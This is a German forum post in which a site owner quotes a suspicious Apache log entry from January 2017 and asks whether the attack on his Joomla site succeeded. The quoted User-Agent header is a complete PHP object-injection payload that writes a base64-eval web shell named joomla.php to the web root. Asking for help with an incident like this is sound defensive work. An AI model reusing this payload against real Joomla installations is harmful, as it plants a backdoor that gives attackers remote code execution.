Guten Tag,
ich habe heute mal meine LogFiles angesehen und mir ist dabei ein auffälliger Eintrag ins Auge gefallen:
anon-192-151-151-175.ip.invalid - - [16/Jan/2017:00:18:12 +0100] "GET / HTTP/1.1" 403 202 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:238:\"file_put_contents($_SERVER[\"DOCUMENT_ROOT\"].chr(47).\"joomla.php\",\"|=|\\x3C\".chr(63).\"php \\x24mujj=\\x24_POST['360'];if(\\x24mujj!=''){\\x24xsser=base64_decode(\\x24_POST['z0']);@eval(\\\"\\\\\\x24safedg=\\x24xsser;\\\");}\");JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}~\xd9"
Der Eintrag ist wie zu sehen vom 16. Januar 2017. Das Sicherheitsupdate von Joomla (3.6.5) habe ich mit ziemlich großer Sicherheit im Dezember eingespielt. Es ging bei den vorherigen Versionen ja gerade um solche Einträge.
Nun meine Frage: War dieser Eintrag/Angriff erfolgreich? Ich habe bereits alle Passwörter sicherheitshalber geändert. Mir fallen aber auch keine auffälligen Änderungen an Dateien, etc. auf. Der potentielle Angriff liegt dann ja auch bereits etwa einen Monat zurück. Ich bitte um Hilfe, da ich selbst nicht genau weiß, wie ich weiter verfahren soll. Sollte es sich tatsächlich um einen erfolgreichen Angriff handeln, weiß ich nicht, wo die Sicherheitslücke sein soll…
Irgendwelche auffälligen Benutzer konnte ich nicht finden.